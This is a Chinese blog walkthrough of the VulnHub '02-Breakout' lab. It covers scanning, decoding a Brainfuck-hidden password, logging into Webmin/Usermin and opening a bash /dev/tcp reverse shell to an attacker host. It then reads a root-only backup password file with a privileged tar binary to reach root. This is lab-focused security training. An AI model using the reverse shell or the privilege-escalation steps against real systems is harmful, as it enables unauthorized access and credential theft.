当前位置：首页 > news >正文

vulhub系列-76-02-Breakout(超详细)

news 2026/4/21 7:27:07

免责声明：本文记录的是 02-Breakout 渗透测试靶机的解题过程，所有操作均在本地授权环境中进行。内容仅供网络安全学习与防护研究使用，请勿用于任何非法用途。读者应遵守《网络安全法》及相关法律法规，自觉维护网络空间安全。

环境： https://download.vulnhub.com/empire/02-Breakout.zip

一、信息收集

1、探测目标IP地址

arp-scan -l #探测当前网段的所有ip地址

┌──(root㉿kali)-[~] └─# arp-scan -l #探测当前网段的所有ip地址 Interface: eth0, type: EN10MB, MAC: 00:0c:29:55:2f:ef, IPv4: 192.168.0.22 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.0.1 00:50:56:c0:00:08 VMware, Inc. 192.168.0.2 00:50:56:e8:e2:84 VMware, Inc. 192.168.0.28 00:0c:29:f5:33:66 VMware, Inc. 192.168.0.254 00:50:56:e3:aa:d9 VMware, Inc.  5 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.959 seconds (130.68 hosts/sec). 4 responded

nmap -sP 192.168.0.0/24

┌──(root㉿kali)-[~] └─# nmap -sP 192.168.0.0/24 Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-24 07:24 -0400 Nmap scan report for 192.168.0.1 Host is up (0.00019s latency). MAC Address: 00:50:56:C0:00:08 (VMware) Nmap scan report for 192.168.0.2 Host is up (0.00011s latency). MAC Address: 00:50:56:E8:E2:84 (VMware) Nmap scan report for 192.168.0.28 Host is up (0.00013s latency). MAC Address: 00:0C:29:F5:33:66 (VMware) Nmap scan report for 192.168.0.254 Host is up (0.00010s latency). MAC Address: 00:50:56:E3:AA:D9 (VMware) Nmap scan report for 192.168.0.22 Host is up. Nmap done: 256 IP addresses (5 hosts up) scanned in 4.52 seconds

目标IP：192.168.0.28

2、探测目标IP开放端口

nmap -A -T4 -p 1-65535 192.168.0.28

┌──(root㉿kali)-[~] └─# nmap -A -T4 -p 1-65535 192.168.0.28 Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-24 07:24 -0400 Nmap scan report for 192.168.0.28 Host is up (0.00028s latency). Not shown: 65530 closed tcp ports (reset) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.51 ((Debian)) |_http-title: Apache2 Debian Default Page: It works |_http-server-header: Apache/2.4.51 (Debian) 139/tcp open netbios-ssn Samba smbd 4 445/tcp open netbios-ssn Samba smbd 4 10000/tcp open http MiniServ 1.981 (Webmin httpd) |_http-server-header: MiniServ/1.981 |_http-title: 200 &mdash; Document follows 20000/tcp open http MiniServ 1.830 (Webmin httpd) |_http-title: 200 &mdash; Document follows |_http-server-header: MiniServ/1.830 MAC Address: 00:0C:29:F5:33:66 (VMware) Device type: general purpose|router Running: Linux 4.X|5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 1 hop  Host script results: | smb2-time: | date: 2026-03-24T11:24:54 |_ start_date: N/A | smb2-security-mode: | 3.1.1: |_ Message signing enabled but not required |_nbstat: NetBIOS name: BREAKOUT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)  TRACEROUTE HOP RTT ADDRESS 1 0.28 ms 192.168.0.28  OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 44.69 seconds

端口：80、139、445、10000、20000

3、目录探测

dirsearch -u http://192.168.0.28

┌──(root㉿kali)-[~] └─# dirsearch -u http://192.168.0.28 /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460 Output File: /root/reports/http_192.168.0.28/_26-03-24_07-25-00.txt Target: http://192.168.0.28/ [07:25:00] Starting: [07:25:01] 403 - 277B - /.ht_wsr.txt [07:25:01] 403 - 277B - /.htaccess.bak1 [07:25:01] 403 - 277B - /.htaccess.sample [07:25:01] 403 - 277B - /.htaccess.save [07:25:01] 403 - 277B - /.htaccess_extra [07:25:01] 403 - 277B - /.htaccess.orig [07:25:01] 403 - 277B - /.htaccess_sc [07:25:01] 403 - 277B - /.htaccess_orig [07:25:01] 403 - 277B - /.htaccessOLD2 [07:25:01] 403 - 277B - /.htaccessOLD [07:25:01] 403 - 277B - /.htaccessBAK [07:25:01] 403 - 277B - /.html [07:25:01] 403 - 277B - /.htm [07:25:01] 403 - 277B - /.htpasswd_test [07:25:01] 403 - 277B - /.htpasswds [07:25:01] 403 - 277B - /.httr-oauth [07:25:16] 301 - 313B - /manual -> http://192.168.0.28/manual/ [07:25:16] 200 - 208B - /manual/index.html [07:25:21] 403 - 277B - /server-status [07:25:21] 403 - 277B - /server-status/ Task Completed

二、漏洞利用

1、信息搜集

http://192.168.0.28/manual/en/index.html

http://192.168.0.28:20000

https://192.168.0.28:20000/

查看源码可以发现最下面有一串不知道是什么东西，查了一下这是一个Brainfuck编码。

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.

解码后

.2uqPEfj3D<P'a-3

这应该是一个密码，暂且当密码吧，毕竟账号也没有这么奇怪的，在nmap扫描端口的时候我们知道了139、445在 samba软件上。使用下列命令扫一下相关信息。

enum4linux -a 192.168.0.28 密码：.2uqPEfj3D<P'a-3

┌──(root㉿kali)-[~] └─# enum4linux -a 192.168.0.28 Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Mar 24 07:31:29 2026 =========================================( Target Information )========================================= Target ........... 192.168.0.28 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ============================( Enumerating Workgroup/Domain on 192.168.0.28 )============================ [+] Got domain/workgroup name: WORKGROUP ================================( Nbtstat Information for 192.168.0.28 )================================ Looking up status of 192.168.0.28 BREAKOUT <00> - B <ACTIVE> Workstation Service BREAKOUT <03> - B <ACTIVE> Messenger Service BREAKOUT <20> - B <ACTIVE> File Server Service ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name WORKGROUP <1d> - B <ACTIVE> Master Browser WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections MAC Address = 00-00-00-00-00-00 ===================================( Session Check on 192.168.0.28 )=================================== [+] Server 192.168.0.28 allows sessions using username '', password '' ================================( Getting domain SID for 192.168.0.28 )================================ Domain Name: WORKGROUP Domain Sid: (NULL SID) [+] Can't determine if host is part of domain or part of a workgroup ===================================( OS information on 192.168.0.28 )=================================== [E] Can't get OS info with smbclient [+] Got OS info for 192.168.0.28 from srvinfo: BREAKOUT Wk Sv PrQ Unx NT SNT Samba 4.13.5-Debian platform_id : 500 os version : 6.1 server type : 0x809a03 =======================================( Users on 192.168.0.28 )======================================= Use of uninitialized value $users in print at ./enum4linux.pl line 972. Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975. Use of uninitialized value $users in print at ./enum4linux.pl line 986. Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988. =================================( Share Enumeration on 192.168.0.28 )================================= smbXcli_negprot_smb1_done: No compatible protocol selected by server. Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers IPC$ IPC IPC Service (Samba 4.13.5-Debian) Reconnecting with SMB1 for workgroup listing. Protocol negotiation to server 192.168.0.28 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE Unable to connect with SMB1 -- no workgroup available [+] Attempting to map shares on 192.168.0.28 //192.168.0.28/print$ Mapping: DENIED Listing: N/A Writing: N/A [E] Can't understand response: NT_STATUS_OBJECT_NAME_NOT_FOUND listing \* //192.168.0.28/IPC$ Mapping: N/A Listing: N/A Writing: N/A ============================( Password Policy Information for 192.168.0.28 )============================ Password: [+] Attaching to 192.168.0.28 using a NULL share [+] Trying protocol 139/SMB... [+] Found domain(s): [+] BREAKOUT [+] Builtin [+] Password Info for Domain: BREAKOUT [+] Minimum password length: 5 [+] Password history length: None [+] Maximum password age: 136 years 37 days 6 hours 21 minutes [+] Password Complexity Flags: 000000 [+] Domain Refuse Password Change: 0 [+] Domain Password Store Cleartext: 0 [+] Domain Password Lockout Admins: 0 [+] Domain Password No Clear Change: 0 [+] Domain Password No Anon Change: 0 [+] Domain Password Complex: 0 [+] Minimum password age: None [+] Reset Account Lockout Counter: 30 minutes [+] Locked Account Duration: 30 minutes [+] Account Lockout Threshold: None [+] Forced Log off Time: 136 years 37 days 6 hours 21 minutes [+] Retieved partial password policy with rpcclient: Password Complexity: Disabled Minimum Password Length: 5 =======================================( Groups on 192.168.0.28 )======================================= [+] Getting builtin groups: [+] Getting builtin group memberships: [+] Getting local groups: [+] Getting local group memberships: [+] Getting domain groups: [+] Getting domain group memberships: ==================( Users on 192.168.0.28 via RID cycling (RIDS: 500-550,1000-1050) )================== [I] Found new SID: S-1-22-1 [I] Found new SID: S-1-5-32 [I] Found new SID: S-1-5-32 [I] Found new SID: S-1-5-32 [I] Found new SID: S-1-5-32 [+] Enumerating users using SID S-1-5-21-1683874020-4104641535-3793993001 and logon username '', password '' S-1-5-21-1683874020-4104641535-3793993001-501 BREAKOUT\nobody (Local User) S-1-5-21-1683874020-4104641535-3793993001-513 BREAKOUT\None (Domain Group) [+] Enumerating users using SID S-1-5-32 and logon username '', password '' S-1-5-32-544 BUILTIN\Administrators (Local Group) S-1-5-32-545 BUILTIN\Users (Local Group) S-1-5-32-546 BUILTIN\Guests (Local Group) S-1-5-32-547 BUILTIN\Power Users (Local Group) S-1-5-32-548 BUILTIN\Account Operators (Local Group) S-1-5-32-549 BUILTIN\Server Operators (Local Group) S-1-5-32-550 BUILTIN\Print Operators (Local Group) [+] Enumerating users using SID S-1-22-1 and logon username '', password '' S-1-22-1-1000 Unix User\cyber (Local User) ===============================( Getting printer info for 192.168.0.28 )=============================== No printers returned. enum4linux complete on Tue Mar 24 07:32:09 2026

等到一个用户：cyber

扫到了一个cyber的账户，在两个界面尝试，20000端口可以登录成功。可以看到一个终端界面，进去看看有没有什么命令可以执行

cyber/.2uqPEfj3D<P'a-3

登录成功

2、反弹shell

浏览器终端：

bash -i >& /dev/tcp/192.168.0.22/8888 0>&1

kali：

nc -lvnp 8888

反弹成功：

┌──(root?kali)-[~] └─# nc -lvnp 8888 listening on [any] 8888 ... connect to [192.168.0.22] from (UNKNOWN) [192.168.0.28] 36682 bash: cannot set terminal process group (1636): Inappropriate ioctl for device bash: no job control in this shell cyber@breakout:~$

三、权限提升

1、信息搜集

我们去它的备份文件里找找有没有另一个网站的密码。

cd /var/backups ls -al

cyber@breakout:~$ cd /var/backups cd /var/backups cyber@breakout:/var/backups$ cyber@breakout:/var/backups$ ls -al ls -al total 28 drwxr-xr-x 2 root root 4096 Mar 24 07:29 . drwxr-xr-x 14 root root 4096 Oct 19 2021 .. -rw-r--r-- 1 root root 12732 Oct 19 2021 apt.extended_states.0 -rw------- 1 root root 17 Oct 20 2021 .old_pass.bak cyber@breakout:/var/backups$

将备份文件压缩再解压缩后再访问就可以得到密码。

cd ~ tar -cf bak.tar /var/backups/.old_pass.bak tar -xf bak.tar cat var/backups/.old_pass.bak

cyber@breakout:/var/backups$ cd ~ cd ~ cyber@breakout:~$ ls ls bak.tar tar user.txt cyber@breakout:~$ cyber@breakout:~$ cyber@breakout:~$ ./tar -cf bak.tar /var/backups/.old_pass.bak ./tar -cf bak.tar /var/backups/.old_pass.bak ./tar: Removing leading `/' from member names cyber@breakout:~$ cyber@breakout:~$ chmod +x tar chmod +x tar chmod: changing permissions of 'tar': Operation not permitted cyber@breakout:~$ cyber@breakout:~$ ls -la ls -la total 580 drwxr-xr-x 8 cyber cyber 4096 Mar 24 07:36 . drwxr-xr-x 3 root root 4096 Oct 19 2021 .. -rw-r--r-- 1 cyber cyber 10240 Mar 24 07:39 bak.tar -rw------- 1 cyber cyber 0 Oct 20 2021 .bash_history -rw-r--r-- 1 cyber cyber 220 Oct 19 2021 .bash_logout -rw-r--r-- 1 cyber cyber 3526 Oct 19 2021 .bashrc drwxr-xr-x 2 cyber cyber 4096 Oct 19 2021 .filemin drwx------ 2 cyber cyber 4096 Oct 19 2021 .gnupg drwxr-xr-x 3 cyber cyber 4096 Oct 19 2021 .local -rw-r--r-- 1 cyber cyber 807 Oct 19 2021 .profile drwx------ 2 cyber cyber 4096 Oct 19 2021 .spamassassin -rwxr-xr-x 1 root root 531928 Oct 19 2021 tar drwxr-xr-x 2 cyber cyber 4096 Oct 20 2021 .tmp drwx------ 16 cyber cyber 4096 Oct 19 2021 .usermin -rw-r--r-- 1 cyber cyber 48 Oct 19 2021 user.txt cyber@breakout:~$ cyber@breakout:~$ tar -xf bak.tar tar -xf bak.tar cyber@breakout:~$ cyber@breakout:~$ cat var/backups/.old_pass.bak cat var/backups/.old_pass.bak Ts&4&YurgtRX(=~h cyber@breakout:~$ cyber@breakout:~$

得到密码之后在20000端口重新登录root账号，即可有root权限的终端

root/Ts&4&YurgtRX(=~h

[root@breakout ~]$ ls rOOt.txt [root@breakout ~]$ cat rOOt.txt 3mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation}  Author: Icex64 & Empire Cybersecurity  [root@breakout ~]$

本文涉及的技术方法仅适用于授权测试环境或合法 CTF 赛事。请勿在未授权的情况下对任何系统进行测试。安全之路，始于合规，终于责任。

查看全文

http://www.jsqmd.com/news/675396/